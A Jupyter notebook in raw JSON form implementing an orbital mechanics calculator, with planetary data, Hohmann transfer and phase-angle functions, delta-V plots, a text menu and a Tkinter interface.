"class Planet():\n def __init__(self, a, M, e, T, r, n, soi):\n self.G = 6.67e-11\n self.semimajor_axis = a\n self.mass = M\n self.eccentricity = e\n self.period = T\n self.radius = r\n self.mu = self.mass * self.G\n self.name = n\n self.soi = soi",
"_____no_output_____"
],
[
"def format_response_dv(dV):\n string_fin = str(dV) + ' ' + 'm/s'\n \n return string_fin \n",
"_____no_output_____"
],
[
"#Earth = Planet(a = 149598023e3, M = 5.927e24, e = 0.0167086, T = 31558149.504, mu = 3.986e14)\n#print('The semi-major axis of Earth is ' + str(Earth.semimajor_axis / 1000) + ' km')\n#print('mu Earth is ' + str(Earth.mu) + ' m^3/s^2')\n\n# All values give in MKS, as it should be, except semi-major axis and soi which is in km\n\n\nMercury = Planet(a = 5.790934e7, M = 3.301e23, e = 0.206, T = 7600176, r = 4879000 / 2, n = 'Mercury', soi = 0.117e6)\nVenus = Planet(a = 1.082041e8, M = 4.867e24, e = 0.007, T = 19394640, r = 12104000 / 2, n = 'Venus', soi = 0.616e6)\nEarth = Planet(a = 1.496e8, M = 5.972e24, e = 0.017, T= 31558149.504, r = 12756000 / 2, n = 'Earth', soi = 0.929e6)\nMars = Planet(a = 2.27987e8, M = 6.417e23, e = 0.093, T = 5.9288e7, r = 6792000 / 2, n = 'Mars', soi = 0.578e6)\nJupiter = Planet(a = 7.783577e8, M = 1.899e27, e = 0.048, T = 3.7528e8, r = 142984000 / 2, n = 'Jupiter', soi = 48.2e6)\nSaturn = Planet(a = 1.4331e9, M = 5.685e26, e = 0.056, T = 9.3031e8, r = 120536000 / 2, n = 'Saturn', soi = 54.5e6)\nUranus = Planet(a = 2.8723e9, M = 8.682e25, e = 0.046, T = 2.649e9, r = 51118000 / 2, n = 'Uranus', soi = 51.9e6)\nNeptune = Planet(a = 4.496912e9, M = 1.024e26, e = 0.010, T = 5.19713e9, r = 49528000 / 2, n = 'Neptune', soi = 86.2e6)\nKerbin = Planet(a = 13599840256, M = 5.2915e22, e = 0, T = 9203545, r = 2370000 / 2, n = 'Kerbin', soi = 0)\n",
"_____no_output_____"
],
[
"type(Earth)\nprint(Earth.mu)",
"398332400000000.0\n"
],
[
"def deltaV_1(r1,r2, Planet):\n \"\"\"Takes two positional arguments and returns a value for the delta-V for a supplied planet\"\"\"\n mu = Planet.mu\n #print(mu_Earth)\n A = np.sqrt(mu / r1)\n #print(A)\n B = (np.sqrt((2 * r2) / (r1 + r2)) - 1)\n #print(B)\n dV1 = A*B\n placehold = dV1\n label['text'] = format_response_dv(placehold)\n return dV1",
"_____no_output_____"
],
[
"def deltaV_2(r1,r2, Planet):\n\t\"\"\"Takes two positional arguments and returns a value for the delta-V for a supplied planet\"\"\"\n\tmu = Planet.mu\n\tA = np.sqrt(mu / r2)\n\tB = (1 - np.sqrt((2 * r1) / (r1 + r2)))\n\tdV2 = A*B\n\treturn dV2",
"_____no_output_____"
],
[
"#The angle has to be converted to radians\ndef NormRad(v_i, theta):\n \"\"\"Calculates the required delta-V for a normal/radial burn\"\"\"\n #A = (v_i ** 2) + (v_f ** 2) \n #B = - ((2 * v_i * v_f) * np.cos(theta))\n #dV = np.sqrt(A * B)\n #dV = np.sqrt((v_i ** 2 + v_f ** 2))\n theta_over_two = np.radians(theta) / 2 \n dV = (2 * v_i) * (np.sin(theta_over_two))\n placehold = dV\n label['text'] = format_response_dv(placehold)\n return np.round(dV)",
"_____no_output_____"
],
[
"def NormRad_TwoVel(v_i, v_f, theta):\n \"\"\"Has the same use as the NormRad function, takes an additional argument for the instance where the final\n velocity is different to the initial\"\"\"\n #A = (v_i ** 2) + (v_f ** 2) \n theta_rad = np.radians(theta)\n #B = - ((2 * v_i * v_f) * np.cos(theta_rad))\n dV = np.sqrt((v_i**2 + v_f**2) - (2 * v_i * v_f * np.cos(theta_rad)))\n placehold = dV\n label['text'] = format_response_dv(placehold)\n return dV",
"_____no_output_____"
],
[
"#print(NormRad_TwoVel(7500, 7500, 8))",
"_____no_output_____"
],
[
"def NormRadPlot(v):\n velocity = v\n theta = np.linspace(0,360,1000)\n theta_over_two = np.radians(theta) / 2 \n delta_V_normRad = (2 * velocity) * (np.sin(theta_over_two))\n plt.plot(theta, delta_V_normRad)\n plt.title('Delta V requirements for a Normal/Radial maneuver')\n plt.ylabel('Delta V')\n plt.xlabel('Angle (Degrees)')\n plt.grid(True)\n plt.show()",
"_____no_output_____"
],
[
"NormRadPlot(7000)",
"_____no_output_____"
],
[
"\n \ndef NormRadPlot_TwoVel(v_i, v_f):\n v_initial = v_i\n v_final = v_f\n theta = np.linspace(0,360,1000)\n theta_rad = np.radians(theta) \n dV_TwoVel = np.sqrt((v_initial**2 + v_final**2) - (2 * v_initial * v_final * np.cos(theta_rad)))\n plt.plot(theta, dV_TwoVel)\n plt.title('Delta V requirements for a Normal/Radial maneuver (with a different final velocity)')\n plt.ylabel('Delta V')\n plt.xlabel('Angle (Degrees)')\n plt.grid(True)\n plt.show()",
"_____no_output_____"
],
[
"NormRadPlot_TwoVel(7000, 20000)",
"_____no_output_____"
],
[
"def Orbital_Velocity(r, Planet):\n \"\"\"Calculates the orbital veloctiy around a given planet using a supplied radius in metres\"\"\"\n mu = Planet.mu\n radius = Planet.radius + r\n v = np.sqrt(mu / radius)\n return v\n\ndef Orbital_Period(r, Planet):\n \"\"\"Calculates the orbital period around a given planet using the supplied radius in metres\"\"\"\n mu = Planet.mu\n radius = Planet.radius + r\n period = np.sqrt((4 * np.pi**2 * radius**3) / (mu)) #seconds\n return period\n",
"_____no_output_____"
],
[
"#Intend to add if statement to break the function if the escape velocity is reached\n\ndef Orbital_Velocity_Plot(Planet):\n mu = Planet.mu\n radius = Planet.radius + np.linspace(1,10000000,10000)\n v = np.sqrt(mu / radius)\n plt.plot(v, radius)\n plt.ylabel('radius (m)')\n plt.xlabel('velocity (m/s)')\n plt.title('Orbital velocity for a given body')\n plt.grid(True)\n \ndef Orbital_Period_Plot(Planet):\n mu = Planet.mu\n radius = Planet.radius + np.linspace(10000,10000000,10000)\n period = np.sqrt((4 * np.pi**2 * radius**3) / (mu)) #seconds\n plt.plot(period, radius)\n plt.ylabel('radius (m)')\n plt.xlabel('period (s)')\n plt.title('Orbital period for a given body')\n plt.grid(True)",
"_____no_output_____"
],
[
"# angle_test = np.linspace(1,90,90)\n# print(angle_test)\n\n# for i in angle_test:\n# \tvel = 2000\n# \td_v = np.sqrt((2 * (vel ** 2)) * (1 - np.cos(i)))\n# \tmatplotlib.pyplot.plot(angle_test, d_v)\n\n\n# print(Jupiter.mass)\n# print(deltaV_1(700000, 900000, Mars))\n# print(deltaV_2(700000,900000, Mars))\n\ndef Planet_info(Planet):\n print('The semi-major axis is ' + str(Planet.semimajor_axis / 1000) + ' km or ' + str(Planet.semimajor_axis / 1.496e11) + ' AU')\n print('mu is ' + str(Planet.mu) + ' m^3/s^2')\n print('The Mass is ' + str(Planet.mass) + ' kg')\n print('The eccentricity is ' + str(Planet.eccentricity) + ' [Dimensionless]')\n print('The orbital period is ' + str(Planet.period) + ' s or ' + str(Planet.period / (60 *60 * 24 * 365)) + ' years')",
"_____no_output_____"
]
],
[
[
"## Phase Angle and Delta-V calculator",
"_____no_output_____"
],
[
"### Phase Angle\n$t_{h} = \\pi \\sqrt{\\frac{(r_1 + r_2)^3}{8\\mu}}$ $\\rightarrow$ $\\mu$ is the the solar value in these cases $\\\\$\n$\\theta_{phase} = 180^{\\circ} - \\sqrt{\\frac{\\mu}{r_1}}\\frac{t_h}{r_2}\\frac{180}{\\pi}$\n\n### Velocity\n$\\Delta v_1 = \\sqrt{\\frac{\\mu}{r_1}}(\\sqrt{\\frac{2 r_2}{r_1 + r_2}}-1)$ $\\\\$\n$v_1 = \\sqrt{\\frac{r_1(r_2 \\cdot r_2^{2} - 2 \\mu) + r_2 \\cdot \\mu}{r_1 \\cdot r_2}}$ $\\rightarrow$ $\\mu$ here is the planetary value. Additionally, $v_2$ is the SOI exit velocity, which should be the same as the value of $\\Delta v_1$. $r_2$ is the SOI radius whilst $r_1$ is the radius of the parking orbit.\n\n### Transfer Burn Point\n$\\epsilon = \\frac{v^2}{2} - \\frac{\\mu}{r}$ $\\rightarrow$ $\\mu$ again is for the origin planet\n\n\n$\\textbf{h} = \\textbf{r} \\times \\textbf{v}$ \n\n\n$e = \\sqrt{1 + \\frac{2 \\epsilon h^2}{\\mu^2}}$\n\n$\\theta = cos^{-1}(\\frac{1}{e})$ $\\rightarrow$ make sure this value is in degrees not radians\n\n$\\therefore$ Ejection Angle $= 180^{\\circ} - \\theta$ \n\nNB Positive values indicate the target planet starts out in\nfront. Negative values mean the target planet starts behind for the first section\n",
"_____no_output_____"
],
[
"GM_sun = 1.32712440018e11\n#a = (149e6 + 227e6) / 2\nprint(Earth.semimajor_axis)\na = ((Earth.semimajor_axis) + (Mars.semimajor_axis)) / 2\nprint(a)\np = np.sqrt((4 * (3.142 ** 2) * (a ** 3)) / GM_sun)\n#t_h = np.pi * np.sqrt(((149597887000 + 227000000000)**3) / 8 * GM_sun)\nprint((str((p / (60 * 60 * 24 * 30)) / 2)) + ' months')",
"_____no_output_____"
]
],
[
[
"def Phase_Angle(Planet1, Planet2):\n \"\"\"Calculates the phase angle (in degrees), this is the angle from one planet to another with the sun at\nthe vertex and is essential for timing interplanetary missions\"\"\"\n GM_sun = 1.327e11\n #print(Planet1.semimajor_axis)\n #t_h = np.pi * np.sqrt(((Planet1.semimajor_axis + Planet2.semimajor_axis)**3) / 8 * GM_sun)\n a = ((Planet1.semimajor_axis) + (Planet2.semimajor_axis)) / 2\n t_h = (np.sqrt((4 * (3.142 ** 2) * (a ** 3)) / GM_sun)) / 2\n #print(t_h)\n print(\"The Hohmann transfer time from \" + str(Planet1.name) + \" to \" + str(Planet2.name) + \" is \" \n + str(np.round((t_h / (60 * 60 * 24 * 30)), decimals=2)) + \" months, or \" \n + str(np.round((t_h / (60 * 60 * 24)), decimals=0)) + \" days\")\n \n phase_angle = (180 - np.sqrt(GM_sun / Planet2.semimajor_axis)) * (t_h / Planet2.semimajor_axis) * (180/np.pi)\n \n deg_per_day = 360 / (Planet2.period / (60 * 60 * 24))\n print(str(np.round(deg_per_day, decimals=2)) + \" degrees per day\") \n phase_angle2 = 180 - (deg_per_day * (t_h / (60 * 60 * 24)))\n \n \n return phase_angle2\n #return phase_angle",
"_____no_output_____"
],
[
"def Delta_v_transfer(Planet1, Planet2): #This is v2\n GM_sun = 1.327e11\n delta_v_transfer = np.sqrt(GM_sun / Planet1.semimajor_axis) \\\n * ((np.sqrt((2 * Planet2.semimajor_axis) / (Planet1.semimajor_axis + Planet2.semimajor_axis))) - 1)\n return delta_v_transfer",
"_____no_output_____"
],
[
"def Ejection_Velocity(Planet1, Planet2, r): #This uses v2 to get v\n r = (r * 1000) + Planet1.radius #Parking orbit radius (planetary radius + orbital altitude)\n excess_v = Delta_v_transfer(Planet1, Planet2) * 1000 #Convert to meters for next calculation\n #print(str(excess_v) + ' is the excess velocity')\n eject_v = np.sqrt((r * (Planet1.soi * ((excess_v) ** 2)) - (2 * Planet1.mu) + (2 * Planet1.soi * Planet1.mu)) \\\n / (r * Planet1.soi))\n #print(eject_v)\n return eject_v / 1000 #Convert back to km",
"_____no_output_____"
],
[
"def Delta_v(Planet1, Planet2, r):\n \"\"\"Input origin body/planet, destination body/planet and the altitude of your parking orbit\n in kilometers and return a value for your delta-V requirements\"\"\"\n v = Ejection_Velocity(Planet1, Planet2, r)\n #print(v)\n #dv1 = Delta_v_transfer(Planet1, Planet2)\n #print(dv1)\n radius = (r * 1000) + Planet1.radius #Take orbital radius given in km and convert to meters for calculation\n v0 = np.sqrt((Planet1.mu) / radius) / 1000 #Convert to km/s\n #print(v0)\n delta_v = v - v0\n print(str(np.round(delta_v, decimals = 2)) + \\\n \" km/s <- This value is the actual delta V required to get from \" + str(Planet1.name) + \" to \" + str(Planet2.name) + \" from a parking orbit of \" + str(r) + \" km\")\n return delta_v",
"_____no_output_____"
],
[
"Delta_v(Earth, Mars, 100)",
"3.63 km/s <- This value is the actual delta V required to get from Earth to Mars from a parking orbit of 100 km\n"
],
[
"Delta_v.__doc__",
"_____no_output_____"
],
[
"def Ejection_Angle(Planet1, Planet2, r):\n v = Ejection_Velocity(Planet1, Planet2, r) * 1000 #Convert to meters\n radius = (r * 1000) + Planet1.radius\n eta = ((v **2) / 2) * (Planet1.mu / radius)\n h = r * v\n e = np.sqrt(1 + ((2 * eta * (h ** 2)) / (Planet1.mu ** 2)))\n theta = np.arccos(1 / e)\n return 'The ejection angle required is ' + str(np.round(180 - np.degrees(theta))) + ' degrees'",
"_____no_output_____"
],
[
"Ejection_Angle(Earth, Mars, 100)",
"_____no_output_____"
]
],
[
[
"##### \nwhile True:\n\tprint('1. Calculate delta V for a Hohmann transfer')\n\tprint('2. Calculate detlta V for a normal or radial burn (Constant velocity)')\n\tprint('3. Calculate detlta V for a normal or radial burn (different final velocity)')\n\tprint('4. Display planetary data')\n\tprint('5. Create custom planet')\n\tprint('6. Exit programme')\n\tchoice = int(input('Select what you would like to do '))\n\tif (choice == 1):\n\t\tprint('1. Mercury')\n\t\tprint('2. Venus')\n\t\tprint('3. Earth')\n\t\tprint('4. Mars')\n\t\tprint('5. Jupiter')\n\t\tprint('6. Saturn')\n\t\tprint('7. Uranus')\n\t\tprint('8. Neptune')\n\t\tplanet = int(input(print('Which planet are you maneuvering around?')))\n\n\t\tif (planet == 1):\n\t\t\tprint('Please enter your r1 and r2 for Mercury in metres for the first burn')\n\t\t\tr1_Mercury = int(input('r1 = '))\n\t\t\tr2_Mercury = int(input('r2 = '))\n\t\t\tprint(str(deltaV_1(r1_Mercury, r2_Mercury, Mercury)) + ' m/s')\n\t\t\tprint('Please enter your r1 and r2 for Mercury in metres for the second burn')\n\t\t\tr1_Mercury_2 = int(input('r1 = '))\n\t\t\tr2_Mercury_2 = int(input('r2 = '))\n\t\t\tprint(str(deltaV_2(r1_Mercury_2, r2_Mercury_2, Mercury)) + ' m/s')\n\t\t\tprint('Total delta V = ' + str(deltaV_1 + deltaV_2) + ' m/s')\n\n\t\telif (planet == 2):\n\t\t\tprint('Please enter your r1 and r2 for Venus in metres for the first burn')\n\t\t\tr1_Venus = int(input('r1 = '))\n\t\t\tr2_Venus = int(input('r2 = '))\n\t\t\tprint(str(deltaV_1(r1_Venus, r2_Venus, Venus)) + ' m/s')\n\t\t\tprint('Please enter your r1 and r2 for Venus in metres for the second burn')\n\t\t\tr1_Venus_2 = int(input('r1 = '))\n\t\t\tr2_Venus_2 = int(input('r2 = '))\n\t\t\tprint(str(deltaV_2(r1_Venus_2, r2_Venus_2, Venus)) + ' m/s')\n\t\t\tprint('Total delta V = ' + str(deltaV_1 + deltaV_2) + ' m/s')\n\n\t\telif (planet == 3):\n\t\t\tprint('Please enter your r1 and r2 for Earth in metres for the first burn')\n\t\t\tr1_Earth = int(input('r1 = '))\n\t\t\tr2_Earth = int(input('r2 = '))\n\t\t\tprint(str(deltaV_1(r1_Earth, r2_Earth, Earth)) + ' m/s')\n\t\t\tprint('Please enter your r1 and r2 for Earth in metres for the second burn')\n\t\t\tr1_Earth_2 = int(input('r1 = '))\n\t\t\tr2_Earth_2 = int(input('r2 = '))\n\t\t\tprint(str(deltaV_2(r1_Earth_2, r2_Earth_2, Earth)) + ' m/s')\n\t\t\tprint('Total delta V = ' + str(deltaV_1 + deltaV_2) + ' m/s')\n\n\t\telif (planet == 4):\n\t\t\tprint('Please enter your r1 and r2 for Mars in metres for the first burn')\n\t\t\tr1_Mars = int(input('r1 = '))\n\t\t\tr2_Mars = int(input('r2 = '))\n\t\t\tprint(str(deltaV_1(r1_Mars, r2_Mars, Mars)) + ' m/s')\n\t\t\tprint('Please enter your r1 and r2 for Mars in metres for the second burn')\n\t\t\tr1_Mars_2 = int(input('r1 = '))\n\t\t\tr2_Mars_2 = int(input('r2 = '))\n\t\t\tprint(str(deltaV_2(r1_Mars_2, r2_Mars_2, Mars)) + ' m/s')\n\t\t\tprint('Total delta V = ' + str(deltaV_1 + deltaV_2) + ' m/s')\n\n\t\telif (planet == 5):\n\t\t\tprint('Please enter your r1 and r2 for Jupiter in metres for the first burn')\n\t\t\tr1_Jupiter = int(input('r1 = '))\n\t\t\tr2_Jupiter = int(input('r2 = '))\n\t\t\tprint(str(deltaV_1(r1_Jupiter, r2_Jupiter, Jupiter)) + ' m/s')\n\t\t\tprint('Please enter your r1 and r2 for Jupiter in metres for the second burn')\n\t\t\tr1_Jupiter_2 = int(input('r1 = '))\n\t\t\tr2_Jupiter_2 = int(input('r2 = '))\n\t\t\tprint(str(deltaV_2(r1_Jupiter_2, r2_Jupiter_2, Jupiter)) + ' m/s')\n\t\t\tprint('Total delta V = ' + str(deltaV_1 + deltaV_2) + ' m/s')\n\n\telif (choice == 2):\n\t\tprint('1. Mercury')\n\t\tprint('2. 
Venus')\n\t\tprint('3. Earth')\n\t\tprint('4. Mars')\n\t\tprint('5. Jupiter')\n\t\tprint('6. Saturn')\n\t\tprint('7. Uranus')\n\t\tprint('8. Neptune')\n\t\tplanet_normrad = int(input('Which planet are you performing a normal or radial burn around? (Assuming velocity is supposed to be maintained)'))\n\t\tangle = int(input('What is the angle you which to change by? (In degrees)'))\n\t\tvelocity_initial = int(input('The initial velocity (m/s) = '))\n#\t\tvelocity_final = int(input('The final velocity (m/s) = '))\n\t\tif (planet_normrad == 1):\n\t\t\tprint(str(NormRad(velocity_initial, angle)) + ' m/s')\n\t\telif (planet_normrad == 2):\n\t\t\tprint(str(NormRad(velocity_initial, angle)) + ' m/s')\n\t\telif (planet_normrad == 3):\n\t\t\tprint(str(NormRad(velocity_initial, angle)) + ' m/s')\n\t\telif (planet_normrad == 4):\n\t\t\tprint(str(NormRad(velocity_initial, angle)) + ' m/s')\n\t\telif (planet_normrad == 5):\n\t\t\tprint(str(NormRad(velocity_initial, angle)) + ' m/s')\n\t\telif (planet_normrad == 6):\n\t\t\tprint(str(NormRad(velocity_initial, angle,)) + ' m/s')\n\t\telif (planet_normrad == 7):\n\t\t\tprint(str(NormRad(velocity_initial, angle)) + ' m/s')\n\t\telse:\n\t\t\tprint(str(NormRad(velocity_initial, angle)) + ' m/s')\n\n\telif (choice == 3):\n\t\tprint('1. Mercury')\n\t\tprint('2. Venus')\n\t\tprint('3. Earth')\n\t\tprint('4. Mars')\n\t\tprint('5. Jupiter')\n\t\tprint('6. Saturn')\n\t\tprint('7. Uranus')\n\t\tprint('8. Neptune')\n\t\tplanet_normrad = int(input('Which planet are you performing a normal or radial burn around? (Assuming velocity is supposed to be maintained)'))\n\t\tangle = int(input('What is the angle you which to change by? (In degrees)'))\n\t\tvelocity_initial = int(input('The initial velocity (m/s) = '))\n\t\tvelocity_final = int(input('The final velocity (m/s) = '))\n\t\tif (planet_normrad == 1):\n\t\t\tprint(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')\n\t\telif (planet_normrad == 2):\n\t\t\tprint(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')\n\t\telif (planet_normrad == 3):\n\t\t\tprint(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')\n\t\telif (planet_normrad == 4):\n\t\t\tprint(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')\n\t\telif (planet_normrad == 5):\n\t\t\tprint(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')\n\t\telif (planet_normrad == 6):\n\t\t\tprint(str(NormRad_TwoVel(velocity_initial, velocity_final, angle,)) + ' m/s')\n\t\telif (planet_normrad == 7):\n\t\t\tprint(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')\n\t\telse:\n\t\t\tprint(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')\n\n\telif (choice == 4):\n\t\tprint('1. Mercury')\n\t\tprint('2. Venus')\n\t\tprint('3. Earth')\n\t\tprint('4. Mars')\n\t\tprint('5. Jupiter')\n\t\tprint('6. Saturn')\n\t\tprint('7. Uranus')\n\t\tprint('8. Neptune')\n\t\tprint('9. 
Custom planet')\n\t\tplanet_info = int(input('Which planets information would you like?'))\n\t\tif (planet_info == 1):\n\t\t\tprint(Planet_info(Mercury))\n\t\telif(planet_info == 2):\n\t\t\tprint(Planet_info(Venus))\n\t\telif(planet_info == 3):\n\t\t\tprint(Planet_info(Earth))\n\t\telif(planet_info == 4):\n\t\t\tprint(Planet_info(Mars))\n\t\telif(planet_info == 5):\n\t\t\tprint(Planet_info(Jupiter))\n\t\telif(planet_info == 6):\n\t\t\tprint(Planet_info(Saturn))\n\t\telif(planet_info == 7):\n\t\t\tprint(Planet_info(Uranus))\n\t\telif(planet_info == 8):\n\t\t\tprint(Planet_info(Neptune))\n\t\telif(planet_info == 9):\n\t\t\ttry:\n\t\t\t\tprint(Planet_info(custom_planet))\n\t\t\texcept NameError:\n\t\t\t\tprint('Custom planet data not found, please create a custom planet and then try again')\n\n\t\telse:\n\t\t\tprint('Incorrect option. Please try again')\n\n\telif (choice == 5):\n\t\tname = print(str(input('What is the name of your custom planet? ')))\n\t\tsemi_major = float(input('What is ' + str(name) + 's semi-major axis? [m] '))\n\t\tmass = float(input('What is the mass of ' + str(name) + '? [kg]'))\n\t\teccen = float(input('What is ' + str(name) + 's eccentricity? [Dimensionless] '))\n\t\tperiod = float(input('What is ' + str(name) + 's orbital period? [s] '))\n\t\trad = float(input('What is the radius of ' + str(name) + '[m]')) \n\t\tcustom_planet = Planet(semi_major, mass, eccen, period, rad)\n\t\tprint(Planet_info(custom_planet))\n\n\n\telif (choice == 6):\n\t\texit()\n\n\telse:\n\t\tprint('Incorrect choice, please select a valid number')\n\n",
"_____no_output_____"
]
],
[
[
"root = tk.Tk()\n#root = tk.Toplevel()\nroot.state('zoomed')\nroot.iconbitmap('rocket_icon.ico')\nroot.title('Orbital Mechanics Calculator')\nHEIGHT = 700\nWIDTH = 1000\ncanvas = tk.Canvas(root, height=HEIGHT, width=WIDTH)\ncanvas.pack()\n\n#background_image = tk.PhotoImage(file='cosmos-5809271_1920.png')\nbackground_image = tk.PhotoImage(file='rocket_background_collaged.png')\nbackground_label = tk.Label(root, image=background_image)\nbackground_label.place(relwidth=1, relheight=1)\n\nframe = tk.Frame(root, bg='#00688B', bd=5)\n#frame = tk.Frame(root, bg='#80c1ff', bd=5)\nframe.place(relx=0.5, rely=0.1, relwidth=0.75, relheight=0.3, anchor='n')\n\ntk.Label(frame, text = \"r1:\").place(relwidth=0.03, relheight=0.15) \ntk.Label(frame, text = \"r2:\").place(relx=0.21, relwidth=0.03, relheight=0.15) \ntk.Label(frame, text = \"Planet:\").place(relx=0.41, relwidth=0.03, relheight=0.15)\n\ntk.Label(frame, text = \"velocity:\").place(relwidth=0.03, relheight=0.15, rely=0.25) \ntk.Label(frame, text = \"theta:\").place(relx=0.21, relwidth=0.03, relheight=0.15, rely=0.25) \n\nentry_r1_1 = tk.Entry(frame, font=40, text='r1')\nentry_r1_1.place(relwidth=0.15, relx=0.05, rely=0, relheight=0.15)\n\nentry_r2_1 = tk.Entry(frame, font=40, text='r2')\nentry_r2_1.place(relwidth=0.15, relx=0.25, rely=0, relheight=0.15)\n\nentry_planet_1 = tk.Entry(frame, font=40, text='Planet')\nentry_planet_1.place(relwidth=0.15, relx=0.45, rely=0, relheight=0.15)\n\nentry_vi = tk.Entry(frame, font=40, text='initial velocity')\nentry_vi.place(relwidth=0.15, relx=0.05, rely=0.25, relheight=0.15)\n\nentry_theta_1 = tk.Entry(frame, font=40)\nentry_theta_1.place(relwidth=0.15, rely=0.25, relx =0.25, relheight=0.15)\n\nentry_vi_2 = tk.Entry(frame, font=40)\nentry_vi_2.place(relwidth=0.15, rely=0.5, relx=0.05, relheight=0.15)\n\nentry_vf = tk.Entry(frame, font=40)\nentry_vf.place(relwidth=0.15, rely=0.5, relx=0.25, relheight=0.15)\n\nentry_theta = tk.Entry(frame, font=40)\nentry_theta.place(relwidth=0.15, rely=0.5, relx =0.45, relheight=0.15)\n\n#entry_\n\n#button_hohmann_1 = tk.Button(frame, text=\"Hohmann Transfer Delta-V\", font=40, command=lambda: deltaV_1(float(entry_r1_1.get()), float(entry_r2_1.get()),Earth))\nbutton_hohmann_1 = tk.Button(frame, text=\"Hohmann Transfer Delta-V\", font=40, command=lambda: deltaV_1(float(entry_r1_1.get()), float(entry_r2_1.get()),entry_planet_1.get()))\nbutton_hohmann_1.place(relx=0.7, rely=0, relheight=0.15, relwidth=0.3)\n\nbutton_normrad = tk.Button(frame, text=\"Normal/Radial Delta-V\", font=40, command=lambda: NormRad(float(entry_vi.get()), float(entry_theta_1.get())))\nbutton_normrad.place(relx=0.7, rely=0.25, relheight=0.15, relwidth=0.3)\n\nbutton_normrad_diffV = tk.Button(frame, text=\"Normal/Radial Delta-V (Different velocities)\", font=40, command=lambda: NormRad_TwoVel(float(entry_vi_2.get()),float(entry_vf.get()),float(entry_theta.get())))\nbutton_normrad_diffV.place(relx=0.7, rely=0.5, relheight=0.15, relwidth=0.3)\n\n\nlower_frame = tk.Frame(root, bg='#00688B', bd=10)\nlower_frame.place(relx=0.5, rely=0.65, relwidth=0.25, relheight=0.2, anchor='n')\n\nlabel = tk.Label(lower_frame)\nlabel.place(relwidth=1, relheight=1)\n\n\nroot.mainloop()",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb53c0169b337c2fafbf32c8b9dcb8be031c3604 | 13,472 | ipynb | Jupyter Notebook | standardiser/docs/01_break_bonds.ipynb | thesgc/standardiser | 635f2608e70c18dc17fa32d514abafc227ff005e | [
"Apache-2.0"
] | 2 | 2016-03-15T15:27:25.000Z | 2021-07-05T04:53:09.000Z | standardiser/docs/01_break_bonds.ipynb | thesgc/standardiser | 635f2608e70c18dc17fa32d514abafc227ff005e | [
"Apache-2.0"
] | null | null | null | standardiser/docs/01_break_bonds.ipynb | thesgc/standardiser | 635f2608e70c18dc17fa32d514abafc227ff005e | [
"Apache-2.0"
] | null | null | null | 69.803109 | 2,777 | 0.806859 | [
[
[
"empty"
]
]
] | [
"empty"
] | [
[
"empty"
]
] |
cb53c233bae51a442ce55bf4c819b08bf8234623 | 396,886 | ipynb | Jupyter Notebook | Midterm_CVXPY solve SVR, implement NN from scratch.ipynb | Yike-Li/Computational-Intellgence | d0dad9b966186bc8bb2ca1a621ad1457e72f689d | [
"Apache-2.0"
] | 1 | 2021-12-28T12:51:35.000Z | 2021-12-28T12:51:35.000Z | Midterm_CVXPY solve SVR, implement NN from scratch.ipynb | Yike-Li/Computational-Intellgence | d0dad9b966186bc8bb2ca1a621ad1457e72f689d | [
"Apache-2.0"
] | null | null | null | Midterm_CVXPY solve SVR, implement NN from scratch.ipynb | Yike-Li/Computational-Intellgence | d0dad9b966186bc8bb2ca1a621ad1457e72f689d | [
"Apache-2.0"
] | null | null | null | 172.784502 | 94,212 | 0.880648 | [
[
[
"<h1>CI Midterm<span class=\"tocSkip\"></span></h1>\n<div class=\"toc\"><ul class=\"toc-item\"><li><span><a href=\"#Q1-Simple-Linear-Regression\" data-toc-modified-id=\"Q1-Simple-Linear-Regression-1\">Q1 Simple Linear Regression</a></span></li><li><span><a href=\"#Q2-Fuzzy-Linear-Regression\" data-toc-modified-id=\"Q2-Fuzzy-Linear-Regression-2\">Q2 Fuzzy Linear Regression</a></span></li><li><span><a href=\"#Q3-Support-Vector-Regression\" data-toc-modified-id=\"Q3-Support-Vector-Regression-3\">Q3 Support Vector Regression</a></span></li><li><span><a href=\"#Q4-Single-layer-NN\" data-toc-modified-id=\"Q4-Single-layer-NN-4\">Q4 Single-layer NN</a></span><ul class=\"toc-item\"><li><span><a href=\"#First-two-iterations-illustration\" data-toc-modified-id=\"First-two-iterations-illustration-4.1\">First two iterations illustration</a></span></li><li><span><a href=\"#Code\" data-toc-modified-id=\"Code-4.2\">Code</a></span></li></ul></li><li><span><a href=\"#Q5-Two-layer-NN\" data-toc-modified-id=\"Q5-Two-layer-NN-5\">Q5 Two-layer NN</a></span><ul class=\"toc-item\"><li><span><a href=\"#First-two-iterations-illustration\" data-toc-modified-id=\"First-two-iterations-illustration-5.1\">First two iterations illustration</a></span></li><li><span><a href=\"#Code\" data-toc-modified-id=\"Code-5.2\">Code</a></span></li></ul></li><li><span><a href=\"#Q6-Re-do-Q1-Q5\" data-toc-modified-id=\"Q6-Re-do-Q1-Q5-6\">Q6 Re-do Q1-Q5</a></span><ul class=\"toc-item\"><li><span><a href=\"#Simple-Linear-Regression\" data-toc-modified-id=\"Simple-Linear-Regression-6.1\">Simple Linear Regression</a></span></li><li><span><a href=\"#Fuzzy-Linear-Regression\" data-toc-modified-id=\"Fuzzy-Linear-Regression-6.2\">Fuzzy Linear Regression</a></span></li><li><span><a href=\"#Support-Vector-Regression\" data-toc-modified-id=\"Support-Vector-Regression-6.3\">Support Vector Regression</a></span></li><li><span><a href=\"#Single-layer-NN\" data-toc-modified-id=\"Single-layer-NN-6.4\">Single-layer NN</a></span><ul class=\"toc-item\"><li><span><a href=\"#First-two-iterations-illustration\" data-toc-modified-id=\"First-two-iterations-illustration-6.4.1\">First two iterations illustration</a></span></li><li><span><a href=\"#Code\" data-toc-modified-id=\"Code-6.4.2\">Code</a></span></li></ul></li><li><span><a href=\"#Two-layer-NN\" data-toc-modified-id=\"Two-layer-NN-6.5\">Two-layer 